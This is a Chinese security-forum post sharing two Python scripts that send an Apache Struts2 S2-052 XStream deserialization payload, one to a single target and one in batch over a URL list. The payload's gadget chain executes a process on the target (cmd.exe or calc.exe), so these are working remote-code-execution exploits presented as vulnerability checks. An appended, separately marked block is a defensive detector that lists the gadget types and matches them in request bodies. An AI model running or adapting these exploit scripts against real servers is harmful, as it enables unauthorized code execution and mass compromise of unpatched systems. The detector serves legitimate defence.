诚殷网络 (Chengyin Network) WEB Security Technology Forum

[Script Tools] ST2-052 batch-check and single-target check Python scripts

2017-9-6 17:13

Batch test
[Python]
#!/usr/bin/env python
# -*- coding: gbk -*-
# -*- coding: utf-8 -*-
#小二逼
import urllib, httplib


httpClient = None

url_list=[i.replace("\n","") for i in open("url.txt","r").readlines()]
for ip in url_list:
    i=0
    while i < len(url_list):
        i=i+1
        try:
            data =('<map><entry><jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"><is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> <string>C:/Windows/System32/cmd.exe</string> </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/></entry></map>')
            headers = {'Content-type': 'application/xml'}

            httpClient = httplib.HTTPConnection(ip, timeout=10)
            httpClient.request('POST', '/struts2-rest-showcase/orders/3', data, headers)
            response = httpClient.getresponse()
            body = response.read()

            # The script treats "java.util.HashMap" in the response body as the vulnerable marker.
            if "java.util.HashMap" in body:
                print ip,"该url存在s2-052漏洞"  # "this URL is affected by S2-052"
            else:
                print ip,"不存在漏洞"  # "not vulnerable"
            break

        except Exception, e:
            print e
        finally:
            if httpClient:
                httpClient.close()

Single-target test

[Python]
#!/usr/bin/env python
# -*- coding: gbk -*-
# -*- coding: utf-8 -*-
#小二逼
import urllib, httplib


httpClient = None
# Prompt text: "enter ip+port (format: 127.0.0.1:8000)"
ip=raw_input("请输入ip+端口(格式:127.0.0.1:8000):")
try:
    data =('<map><entry><jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"><is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> <string>C:/Windows/System32/calc.exe</string> </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/></entry></map>')
    headers = {'Content-type': 'application/xml'}
    httpClient = httplib.HTTPConnection(ip, timeout=10)
    httpClient.request('POST', '/struts2-rest-showcase/orders/3', data, headers)
    response = httpClient.getresponse()
except Exception, e:
    print e
finally:
    if httpClient:
        httpClient.close()



Attachments:
s2-052.zip (1.07 KB, downloads: 22): single-target check
s2-052test.zip (1.19 KB, downloads: 20): batch check
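
Added example, not part of the original post: a server-side check that flags request bodies naming the types used in the XML body above, suitable for running over captured requests to the REST endpoint. The sample requests, client addresses and function names are constructed for illustration.

```python
import re

# Types named in the XML body posted above; a legitimate REST order
# document has no reason to reference any of them.
GADGET_TYPES = {
    "java.lang.ProcessBuilder",
    "javax.imageio.spi.FilterIterator",
    "javax.imageio.ImageIO$ContainsFilter",
    "javax.crypto.CipherInputStream",
    "javax.crypto.NullCipher",
    "com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data",
    "jdk.nashorn.internal.objects.NativeString",
}
CLASS_ATTR = re.compile(r"""\bclass\s*=\s*["']([^"']+)["']""")
TAG_NAME = re.compile(r"<([A-Za-z_][\w.$]*)")
CLASS_TEXT = re.compile(r"<class>\s*([^<\s]+)\s*</class>")

def gadget_types_in(body):
    """Return the sorted gadget types an XML body names as tag or class."""
    named = set(CLASS_ATTR.findall(body))
    named.update(TAG_NAME.findall(body), CLASS_TEXT.findall(body))
    return sorted(named & GADGET_TYPES)

def scan(requests):
    """Return (client, path, hits) for every request body that names one."""
    findings = []
    for req in requests:
        hits = gadget_types_in(req["body"])
        if hits:
            findings.append((req["client"], req["path"], hits))
    return findings

# Constructed sample requests (hypothetical clients, shortened bodies).
SUSPECT_BODY = (
    "<map><entry><jdk.nashorn.internal.objects.NativeString>"
    '<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"/>'
    '<next class="java.lang.ProcessBuilder"><command><string>PLACEHOLDER'
    "</string></command></next>"
    "</jdk.nashorn.internal.objects.NativeString></entry></map>"
)
BENIGN_BODY = "<order><id>3</id><clientName>Bob</clientName><amount>33</amount></order>"
SAMPLE_REQUESTS = [
    {"client": "192.0.2.10", "path": "/struts2-rest-showcase/orders/3", "body": SUSPECT_BODY},
    {"client": "198.51.100.7", "path": "/struts2-rest-showcase/orders/3", "body": BENIGN_BODY},
]

if __name__ == "__main__":
    for client, path, hits in scan(SAMPLE_REQUESTS):
        print(client, path, ", ".join(hits))
```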





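5 replies

ryuuku  Novice White Hat | 2017-9-6 18:26:11
Could I take a look?
root  Administrator | 2017-9-6 19:09:16
ryuuku posted on 2017-9-6 10:26
Could I take a look?

heartk  Intermediate White Hat | 2017-9-7 11:22:09
Can't view it anymore???
catlee  Novice White Hat | 2017-11-12 21:59:57
a374019371  Novice White Hat | 3 days ago
The batch check one won't open; it closes as soon as I open it.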